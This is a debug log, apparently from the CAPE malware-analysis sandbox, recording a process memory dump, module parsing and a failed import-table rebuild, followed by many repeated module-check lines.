2020-03-24 10:16:35,683 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\winrnr.dll
2020-03-24 10:16:35,683 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\winrnr.dll
2020-03-24 10:16:35,683 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\IPHLPAPI.DLL
2020-03-24 10:16:35,697 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\IPHLPAPI.DLL
2020-03-24 10:16:35,697 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\winnsi.dll
2020-03-24 10:16:35,697 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\winnsi.dll
2020-03-24 10:16:35,713 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rasadhlp.dll
2020-03-24 10:16:35,713 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rasadhlp.dll
2020-03-24 10:16:35,713 [root] DEBUG: DumpProcessFixImports: Instantiating PeParser with address: 0x00400000
2020-03-24 10:16:35,729 [root] DEBUG: DumpProcessFixImports: Module entry point VA is 0x00413A84
2020-03-24 10:16:35,729 [root] DEBUG: Module image dump success
2020-03-24 10:16:35,729 [root] DEBUG: DumpProcessFixImports: Found IAT - 0x414000, size: 0x588
2020-03-24 10:16:35,744 [root] DEBUG: IAT parsing finished, found 342 valid APIs, missed 0 APIs
2020-03-24 10:16:35,744 [root] DEBUG: Adding module to module list: advapi32.dll
2020-03-24 10:16:35,760 [root] DEBUG: Adding module to module list: gdi32.dll
2020-03-24 10:16:35,760 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:16:35,760 [root] DEBUG: Adding module to module list: msvcp60.dll
2020-03-24 10:16:35,776 [root] DEBUG: Adding module to module list: msvcrt.dll
2020-03-24 10:16:35,776 [root] DEBUG: Adding module to module list: shell32.dll
2020-03-24 10:16:35,776 [root] DEBUG: Adding module to module list: shlwapi.dll
2020-03-24 10:16:35,776 [root] DEBUG: Adding module to module list: user32.dll
2020-03-24 10:16:35,792 [root] DEBUG: Adding module to module list: wininet.dll
2020-03-24 10:16:35,792 [root] DEBUG: Adding module to module list: winmm.dll
2020-03-24 10:16:35,792 [root] DEBUG: Adding module to module list: ws2_32.dll
2020-03-24 10:16:35,806 [root] DEBUG: Adding module to module list: GdiPlus.dll
2020-03-24 10:16:35,806 [root] DEBUG: Adding module to module list: urlmon.dll
2020-03-24 10:16:35,806 [root] DEBUG: Warning - IAT is not inside the PE image, requires rebasing.
2020-03-24 10:16:35,806 [root] DEBUG: Invalid PE file: import table rebuild failed.
2020-03-24 10:16:35,822 [root] DEBUG: Import table rebuild failed, falling back to unfixed dump.
2020-03-24 10:16:35,838 [root] INFO: Added new CAPE file to list with path: C:\uGrmFZ\CAPE\1540_56812516235161024232020
2020-03-24 10:16:35,838 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00430000.
2020-03-24 10:16:35,854 [root] DEBUG: ApiReader: module list size: 112
2020-03-24 10:16:35,854 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:35,869 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:35,869 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:16:35,869 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:35,884 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:35,884 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:16:35,884 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:16:35,901 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:35,901 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:16:35,901 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:16:35,901 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:16:35,917 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:16:35,917 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:16:35,917 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:16:35,917 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:35,931 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:16:35,931 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\oleaut32.dll
2020-03-24 10:16:35,931 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\urlmon.dll
2020-03-24 10:16:35,947 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\wininet.dll
2020-03-24 10:16:35,947 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\iertutil.dll
2020-03-24 10:16:35,947 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\crypt32.dll
2020-03-24 10:16:35,947 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msasn1.dll
2020-03-24 10:16:35,963 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\wintrust.dll
2020-03-24 10:16:35,963 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\apphelp.dll
2020-03-24 10:16:35,963 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\AppPatch\AcGenral.dll
2020-03-24 10:16:35,963 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\uxtheme.dll
2020-03-24 10:16:35,979 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\winmm.dll
2020-03-24 10:16:35,979 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\samcli.dll
2020-03-24 10:16:35,979 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msacm32.dll
2020-03-24 10:16:35,994 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\version.dll
2020-03-24 10:16:35,994 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:35,994 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sfc.dll
2020-03-24 10:16:36,009 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:36,009 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\userenv.dll
2020-03-24 10:16:36,009 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\profapi.dll
2020-03-24 10:16:36,009 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\dwmapi.dll
2020-03-24 10:16:36,040 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\setupapi.dll
2020-03-24 10:16:36,040 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:36,056 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\devobj.dll
2020-03-24 10:16:36,056 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\mpr.dll
2020-03-24 10:16:36,056 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:16:36,072 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:16:36,072 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcp60.dll
2020-03-24 10:16:36,072 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ws2_32.dll
2020-03-24 10:16:36,072 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\nsi.dll
2020-03-24 10:16:36,088 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
2020-03-24 10:16:36,088 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\mswsock.dll
2020-03-24 10:16:36,104 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\WSHTCPIP.DLL
2020-03-24 10:16:36,104 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\nlaapi.dll
2020-03-24 10:16:36,118 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\NapiNSP.dll
2020-03-24 10:16:36,118 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\pnrpnsp.dll
2020-03-24 10:16:36,134 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\dnsapi.dll
2020-03-24 10:16:36,134 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\winrnr.dll
2020-03-24 10:16:36,134 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\IPHLPAPI.DLL
2020-03-24 10:16:36,151 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\winnsi.dll
2020-03-24 10:16:36,151 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rasadhlp.dll
2020-03-24 10:16:36,151 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,151 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,165 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:36,165 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:36,165 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,181 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,181 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,181 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,197 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,197 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,197 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,213 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,213 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,229 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,229 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,229 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,259 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,259 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,275 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,275 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,275 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,290 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,290 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,290 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,290 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,306 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,306 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,306 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,322 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,322 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,322 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,338 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,338 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,338 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,338 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,352 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,352 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,352 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,352 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,368 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,368 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,368 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,368 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,384 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,384 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,384 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,400 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,400 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,400 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,400 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,415 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,415 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,415 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,430 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,430 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,430 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,430 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,447 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,447 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,447 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,463 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,463 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,493 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,493 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,509 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,509 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,509 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,509 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:16:36,525 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:16:36,525 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,525 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,540 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,540 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,540 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,540 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,572 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,572 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,572 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,586 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,586 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,586 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,602 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,602 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,602 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,602 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,618 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,618 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,618 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,634 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,634 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,634 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,634 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,650 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,650 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,650 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,650 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,664 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,664 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,664 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,680 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,680 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,680 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,697 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,697 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,711 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,711 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,711 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,711 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,727 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,727 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,727 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,743 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,743 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,743 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,743 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,759 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,759 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,775 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,775 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,789 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,789 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
